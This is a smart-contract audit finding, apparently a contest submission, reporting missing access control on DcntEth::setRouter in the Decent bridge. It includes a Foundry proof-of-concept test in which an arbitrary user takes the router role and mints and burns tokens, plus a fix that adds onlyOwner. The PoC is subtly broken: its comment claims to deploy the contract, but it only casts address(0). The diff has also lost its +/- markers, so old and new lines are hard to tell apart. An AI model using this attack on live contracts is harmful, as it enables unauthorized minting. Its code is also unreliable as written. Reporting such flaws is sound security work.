Decent - 0xSimeon's results

Lines of code

https://github.com/decentxyz/decent-bridge/blob/7f90fd4489551b69c20d11eeecb17a3f564afb18/src/DcntEth.sol#L20

Vulnerability details

There is a missing access control in DcntEth::setRouter that allows anyone to call the setRouter function, passing an arbitrary address which is then used as the router across system calls.

Impact

Anyone can set the router and causes undefined and unexpected behavior for the system calls as the router. An attacker or malicious user can gain control of the following functions:

• DcntEth::mint
• DcntEth::burn

Attacker can mint and burn DcntEth which is an OFTV2 (Omni-chain fungible token) at will.

Proof of Concept

Add the following test to DebugActions.t.sol or any foundry test file.

Don't forget to add the following imports:

   import {DcntEth} from "../lib/decent-bridge/src/DcntEth.sol";
   import {Test} from "forge-std/Test.sol";

  function test_MissingDecentEthAccessControl() public {
        // Deploy new DcntEth token contract.
        DcntEth dcntEth = DcntEth(address(0));

        // example amount to mint.
        uint256 UserMintAmount = 1_000_000 ether;

        // make an arbitrary user
        address arbitraryUser = makeAddr("anyUser");

        // set the router to arbitraryUser
        dcntEth.setRouter(arbitraryUser);

        // Now arbitraryUser can call router priviledged functions: mint & burn
        vm.startPrank(arbitraryUser);
        dcntEth.mint(arbitraryUser, UserMintAmount);
        dcntEth.burn(arbitraryUser, 1);

        vm.stopPrank();

        assertEq(dcntEth.balanceOf(arbitraryUser), UserMintAmount - 1);
    }

Tools Used

Manual Analysis

Recommended Mitigation Steps

Add the onlyOwner modifier to the DcntEth::setRouter function

```diff DcntEth::setRouter

• function setRouter(address _router) public {

•   router = _router;
  

• }

• function setRouter(address _router) public onlyOwner {

•   router = _router;
  

• }

## Assessed type

Access Control